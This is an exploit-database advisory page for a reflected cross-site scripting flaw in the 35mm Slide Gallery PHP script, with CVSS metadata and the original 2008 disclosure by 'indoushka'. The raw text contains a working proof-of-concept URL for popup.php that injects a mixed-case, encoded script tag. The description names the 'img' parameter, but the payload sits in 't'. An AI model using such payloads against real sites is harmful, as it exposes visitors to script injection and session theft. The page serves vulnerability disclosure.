header-logo
Suggest Exploit
vendor:
35mm Slide Gallery
by:
indoushka
8.8
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: 35mm Slide Gallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
2008

XSS Vulnerability in 35mm Slide Gallery

The 35mm Slide Gallery is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the 'img' parameter of the 'popup.php' script. This code will be executed in the browser of the victim when they view the page.

Mitigation:

Input validation should be used to prevent XSS attacks.
Source

Exploit-DB raw data:

| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : powered by 35mm Slide Gallery (http://www.andymack.com/freescripts/)    |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       |
| # Bug      : XSS                                                                     | 
======================      Exploit By indoushka       =================================
| # Exploit  : 
| 
| 1- http://localhost/slideshowgallery/popup.php?img=imagefolder1%2Fkoalalikefather%2Ejpg&w=215&h=162&t=hacked-by-indoushka</title><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------